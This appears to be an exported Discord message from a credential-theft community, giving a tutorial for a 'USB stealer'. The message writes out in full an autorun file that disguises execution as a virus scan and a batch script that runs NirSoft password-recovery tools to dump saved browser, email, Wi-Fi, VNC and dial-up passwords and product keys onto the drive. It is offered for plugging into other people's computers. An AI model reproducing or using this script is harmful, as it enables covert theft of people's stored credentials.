==============================================================
Guild: VAULT ALL LOCKERS NEED |  /prediction
Channel: beaming methods / usb-stealer
==============================================================

[PM] xeno#0666
HOW TO MAKE A USB STEALER 

Basically with a functional stealer you can plug it into any persons PC and steal all their saved passwords, etc. 
No need for Hosting,Software,Crypting
TUTORIAL:

open notepad/wordpad
type:
[autorun]
open=launch.bat
ACTION= Perform a Virus Scan
save this as AUTORUN.inf
open a new notepad/wordpad document
type:
start mspass.exe /stext mspass.txt
start mailpv.exe /stext mailpv.txt
start iepv.exe /stext iepv.txt
start pspv.exe /stext pspv.txt
start PasswordFox.exe /stext passwordfox.txt
start OperaPassView.exe /stext OperaPassView.txt
start ChromePass.exe /stext ChromePass.txt
start Dialupass.exe /stext Dialupass.txt
start netpass.exe /stext netpass.txt
start WirelessKeyView.exe /stext WirelessKeyView.txt
start BulletsPassView.exe /stext BulletsPassView.txt
start VNCPassView.exe /stext VNCPassView.txt
start OpenedFilesView.exe /stext OpenedFilesView.txt
start ProduKey.exe /stext ProduKey.txt
start USBDeview.exe /stext USBDeview.txt
save this as LAUNCH.bat
copy the autorun and launch file to your USB

go to http://www.nirsoft.net/ and download the programs named in step 2

extract the files you downloaded to your desktop and copy all the .exe files to your USB
remove and re-insert your USB

click on the option perform a virus scan
(this is an example, if you want it to say something else go to the autorun file and change it 😉 )
go to my computer�-> USB DRIVE and open it
you will now see some text files, if you open them you will see usernames and passwords
NOTICE: this only recovers passwords that have once been saved on your computer!

{Embed}
http://www.nirsoft.net/
freeware utilities: password recovery, system utilities, desktop ut...
Unique collection of freeware desktop utilities, system utilities, password recovery tools, and more
https://images-ext-1.discordapp.net/external/t784RkY1WwyWhRAofD8VpK_Hw5NPWWB6kM2K7Oxvc3g/https/www.nirsoft.net/nirsoft2.gif


==============================================================
Exported 1 message(s)
==============================================================
